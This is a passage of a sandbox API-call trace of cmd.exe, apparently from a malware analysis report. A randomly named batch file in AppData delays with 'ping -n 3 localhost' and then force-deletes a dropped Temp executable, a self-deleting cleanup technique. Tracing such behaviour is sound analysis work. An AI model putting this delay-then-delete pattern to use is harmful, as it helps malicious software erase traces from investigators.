_BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] GetFileType (hFile=0x7) returned 0x2 [0116.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.789] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) returned 1 [0116.789] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0116.789] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0116.789] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0116.789] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0116.789] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.789] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.790] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) 
returned 1 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3a0958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3a0958*, lpNumberOfCharsWritten=0x1ef518*=0x4) returned 1 [0116.790] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" -n 3 localhost ") returned 16 [0116.790] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.790] GetFileType (hFile=0x7) returned 0x2 [0116.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.791] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x10) returned 1 [0116.791] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: _Buffer="\r\n") returned 2 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] GetFileType (hFile=0x7) returned 0x2 [0116.791] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.791] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0116.791] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.791] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0116.791] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0116.791] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0116.791] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0116.791] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0116.791] _wcsicmp (_String1="ping", _String2="COPY") returned 
13 [0116.791] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0116.791] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0116.791] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0116.791] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0116.791] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0116.791] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0116.791] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0116.792] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0116.792] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0116.792] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0116.792] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0116.792] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0116.792] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0116.792] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0116.792] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0116.792] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0116.792] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0116.792] _wcsicmp (_String1="ping", _String2="START") returned -3 [0116.792] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0116.792] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0116.792] _wcsicmp (_String1="ping", 
_String2="MOVE") returned 3 [0116.792] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0116.792] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0116.792] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0116.792] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0116.792] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0116.792] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0116.792] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0116.792] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0116.792] SetErrorMode (uMode=0x0) returned 0x0 [0116.792] SetErrorMode (uMode=0x1) returned 0x0 [0116.793] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b0550, lpFilePart=0x1ef2e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef2e8*="Desktop") returned 0x18 [0116.793] SetErrorMode (uMode=0x0) returned 0x1 [0116.793] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.793] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.793] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0x3b0838 [0116.794] FindClose (in: hFindFile=0x3b0838 | out: hFindFile=0x3b0838) returned 1 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0xffffffff [0116.794] GetLastError () returned 0x2 [0116.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ef064, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef064) returned 0x3b0838 [0116.794] FindClose (in: hFindFile=0x3b0838 | out: hFindFile=0x3b0838) returned 1 [0116.795] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.795] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.795] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0116.795] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.795] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.795] GetLastError () returned 0x2 [0116.795] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, 
lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.795] GetLastError () returned 0x2 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0x3b0d80 [0116.796] FindClose (in: hFindFile=0x3b0d80 | out: hFindFile=0x3b0d80) returned 1 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0xffffffff [0116.796] GetLastError () returned 0x2 [0116.796] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ee950, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee950) returned 0x3b0d80 [0116.796] FindClose (in: hFindFile=0x3b0d80 | out: hFindFile=0x3b0d80) returned 1 [0116.796] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.796] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.796] GetConsoleTitleW (in: lpConsoleTitle=0x1eee48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.796] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eecd0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eed98 | out: lpAttributeList=0x1eecd0, lpSize=0x1eed98) returned 1 [0116.796] UpdateProcThreadAttribute (in: lpAttributeList=0x1eecd0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eed90, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eecd0, lpPreviousValue=0x0) returned 1 [0116.796] GetStartupInfoW (in: lpStartupInfo=0x1eec8c | out: lpStartupInfo=0x1eec8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0116.796] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0116.798] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1eed2c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eed78 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x1eed78*(hProcess=0x54, hThread=0x58, dwProcessId=0xe70, dwThreadId=0xe74)) returned 1 [0116.891] CloseHandle (hObject=0x58) returned 1 [0116.892] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.892] GetEnvironmentStringsW () returned 0x3a0970* [0116.892] FreeEnvironmentStringsW (penv=0x3a0970) returned 1 [0116.892] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0120.816] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eec6c | out: lpExitCode=0x1eec6c*=0x0) returned 1 [0120.816] CloseHandle (hObject=0x54) returned 1 [0120.816] _vsnwprintf (in: _Buffer=0x1eedb4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eec78 | out: _Buffer="00000000") returned 8 [0120.816] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.816] GetEnvironmentStringsW () returned 0x3a2c28* [0120.816] FreeEnvironmentStringsW (penv=0x3a2c28) returned 1 [0120.816] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.816] 
GetEnvironmentStringsW () returned 0x3a2c28* [0120.817] FreeEnvironmentStringsW (penv=0x3a2c28) returned 1 [0120.817] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eecd0 | out: lpAttributeList=0x1eecd0) [0120.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.817] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.817] SetConsoleInputExeNameW () returned 0x1 [0120.817] GetConsoleOutputCP () returned 0x1b5 [0120.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.817] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.818] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.818] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.818] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.818] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.818] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.819] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.819] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x7c, lpOverlapped=0x0) returned 1 [0120.820] 
SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.820] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n") returned 62 [0120.820] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.820] GetFileType (hFile=0x54) returned 0x1 [0120.820] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.820] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.822] _tell (_FileHandle=3) returned 83 [0120.822] _close (_FileHandle=3) returned 0 [0120.822] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef2a4 | out: _Buffer="\r\n") returned 2 [0120.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.822] GetFileType (hFile=0x7) returned 0x2 [0120.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.822] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef264 | out: lpMode=0x1ef264) returned 1 [0120.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.822] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef290, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef290*=0x2) returned 1 [0120.822] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0120.822] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef2a0 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0120.823] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", 
_ArgList=0x1ef2a0 | out: _Buffer=">") returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] GetFileType (hFile=0x7) returned 0x2 [0120.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef268 | out: lpMode=0x1ef268) returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1ef294, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1ef294*=0x19) returned 1 [0120.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.823] GetFileType (hFile=0x7) returned 0x2 [0120.823] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.823] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4ec | out: lpMode=0x1ef4ec) returned 1 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef518, lpReserved=0x0 | out: lpBuffer=0x3af008*, lpNumberOfCharsWritten=0x1ef518*=0x3) returned 1 [0120.824] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef524 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" ") returned 58 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] GetFileType (hFile=0x7) returned 0x2 [0120.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.824] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef4e4 | out: lpMode=0x1ef4e4) returned 1 [0120.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.824] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1ef510, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef510*=0x3a) returned 1 [0120.825] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef544 | out: 
_Buffer="\r\n") returned 2 [0120.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.825] GetFileType (hFile=0x7) returned 0x2 [0120.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0120.825] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef504 | out: lpMode=0x1ef504) returned 1 [0120.825] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.825] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef530, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ef530*=0x2) returned 1 [0120.825] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0120.825] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0120.825] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0120.825] GetConsoleTitleW (in: lpConsoleTitle=0x1ef0b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.826] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee130, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee12c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0120.826] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2="..") returned 58 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x2020 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", _String2=".") returned 58 [0120.826] _wcsicmp (_String1="hvGO9ckx.exe", 
_String2="..") returned 58 [0120.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x2020 [0120.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", fInfoLevelId=0x0, lpFindFileData=0x3b0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b0554) returned 0x390aa8 [0120.827] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 1 [0120.827] FindNextFileW (in: hFindFile=0x390aa8, lpFindFileData=0x3b0554 | out: lpFindFileData=0x3b0554) returned 0 [0120.828] GetLastError () returned 0x12 [0120.828] FindClose (in: hFindFile=0x390aa8 | out: hFindFile=0x390aa8) returned 1 [0120.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.829] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.829] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.829] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.829] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.829] SetConsoleInputExeNameW () returned 0x1 [0120.829] GetConsoleOutputCP () returned 0x1b5 [0120.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.829] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\sQFgqtRn.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\sqfgqtrn.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef4ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.829] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) 
returned 3 [0120.829] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0120.830] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef4d0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1ef4d0*=0x3e, lpOverlapped=0x0) returned 1 [0120.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\"\r\n") returned 62 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] GetFileType (hFile=0x54) returned 0x1 [0120.830] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.830] SetFilePointer 